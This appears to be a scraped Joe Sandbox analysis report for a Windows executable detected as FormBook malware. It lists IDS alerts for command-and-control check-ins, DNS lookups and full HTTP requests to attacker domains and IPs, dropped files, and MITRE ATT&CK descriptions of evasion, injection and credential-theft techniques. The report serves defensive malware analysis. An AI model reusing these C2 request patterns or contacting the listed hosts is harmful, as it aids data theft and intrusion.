String ID: $$@
API String ID: 0-1194432280
Opcode ID: df0b90c95047c80fee7eb60fcf5f3703b7a27241dafeba5264112f12d5636b88
Instruction ID: cc28ae36a183abd755d1b4024708f39bfe30c9287a12b1602c6bce750197ac0f
Opcode Fuzzy Hash: df0b90c95047c80fee7eb60fcf5f3703b7a27241dafeba5264112f12d5636b88
Instruction Fuzzy Hash: E0811CB2D002699BDB35CF54CD45BEAB7B8AF08714F0141DAE919B7280E7706E85CFA0

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 4x nop then jmp 08F8D48Dh	0_2_08F8CA8E
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 4x nop then xor eax, eax	12_2_00179EB0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 4x nop then pop edi	12_2_0017E20A
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 4x nop then mov ebx, 00000004h	12_2_042504DE

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 45.113.82.65:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 192.186.57.30:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 67.223.118.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 45.113.82.65:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 67.223.118.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 192.186.57.30:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 67.223.118.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 45.113.82.65:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 192.186.57.30:80

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View	ASN Name: SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong

Source: ydJaT4b5N8.exe	Virustotal: Detection: 38%			Perma Link
Source: ydJaT4b5N8.exe	ReversingLabs: Detection: 63%

Source:	DNS query: www.creaturpace.xyz
Source:	DNS query: www.biumini.xyz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /cs7c/?FT=CdryMvIuRPhrhNp+O2hlvAXT+rMadDvfHxUD4gw+9ftZ82ygsyKDcDrn5TCIrgxbP6qLLp4j5uEJgTcnyoCHETCu03cQKbTqCiBrBkjQVvF/A9AiZwKEYph/IvS0e338ZMVaN10w+ZCw&LZXLP=uRtDln HTTP/1.1Host: www.comect.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Source: global traffic	HTTP traffic detected: GET /3zfl/?FT=dzW3r0JajFi4yU+t5A3d9Cj0KGYHP6jpjSNWRO4j4rUaxvSRRHR1AwWhDoruFd3w8D11XAT8WPBX/+s6mj4ahUfcluh1giEyYW754F2hOtLVKwjjTtv3gq1pskTXS46vpAuqfW2BmGlQ&LZXLP=uRtDln HTTP/1.1Host: www.10000.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Source: global traffic	HTTP traffic detected: GET /iqne/?FT=VjyLh8/TQUU29ht9sglv6JaML71ZquykbcLw6LPhnWCKA7K1Zlfytdmm6EghNtNIJzDGRbJ4b+Pf1nzjNE47Qwrk29fp3z3J9k0CszfKgPRR/UIQYMjTRi1CBqkwXRex3HM9PnLmwRgb&LZXLP=uRtDln HTTP/1.1Host: www.creaturpace.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Source: global traffic	HTTP traffic detected: GET /avm2/?FT=6flP2NBanoj1mJhTT9CcmrsvLKpegCBIyTYKy6cM/MLUWAXAJvJCIjNuYRuuhMslcuSeXmXhbRN15WMnyNK6Lzjzu1vwOU2WN5AiA5/FDSnJY+GQW2n8GmjYxtSliihue8e28SerNnoc&LZXLP=uRtDln HTTP/1.1Host: www.biumini.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Source: global traffic	HTTP traffic detected: GET /slmn/?LZXLP=uRtDln&FT=vxRo/NbVr8++Da/4WcnE3/CMt1mo3pQSabR/jnYcNQmpsvXfiQpyTUTP9jDEDnRaomHmWLK2jOKhHQ02TF4XNId4tyIZnHFEhbycwWoVa5WMOCY2OT/zuf88phewPkHObckRHqNeZZ6B HTTP/1.1Host: www.rtpbnmax.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Source: global traffic	HTTP traffic detected: GET /d7uk/?FT=Ww2A09LOqGBMTXt4MedKcPRCMpeKWxT/u0+P61SifFgERUvdQ+vHh8C9RtfMyLt44cTnxS353sxTMKGc1pO1hMJRS0vlIay91RDnqzSNCPeQGM5pjPJ3viUn+HC98mxcn5WmZtajdbPS&LZXLP=uRtDln HTTP/1.1Host: www.yxni.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Source: global traffic	HTTP traffic detected: GET /vq3j/?LZXLP=uRtDln&FT=Ho4qb36IjnpDFVZFLo/hXHKtFL2cfD4IJxQxqb0l9IDMLo5abMph71gDJK+8i26TojJGFu/UDiJcafFRn4FMXAQb1xJcT0FNlvPlef7rROoumTH4jsJKwIxQhd+ZJS2reu6H0mGxpuOU HTTP/1.1Host: www.vilakodsiy.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko

Source: global traffic	DNS traffic detected: DNS query: www.comect.online
Source: global traffic	DNS traffic detected: DNS query: www.10000.space
Source: global traffic	DNS traffic detected: DNS query: www.creaturpace.xyz
Source: global traffic	DNS traffic detected: DNS query: www.biumini.xyz
Source: global traffic	DNS traffic detected: DNS query: www.rtpbnmax.shop
Source: global traffic	DNS traffic detected: DNS query: www.yxni.vip
Source: global traffic	DNS traffic detected: DNS query: www.vilakodsiy.sbs

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ydJaT4b5N8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ydJaT4b5N8.exe.log

C:\Users\user\AppData\Local\Temp\FyF7rO8j-P

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
ydJaT4b5N8.exe

Function 08F89050 Relevance: 2.9, Strings: 2, Instructions: 371
COMMON

Function 00AD2298 Relevance: 2.8, Strings: 2, Instructions: 262
COMMON

Function 08F8B704 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Function 08F8B710 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre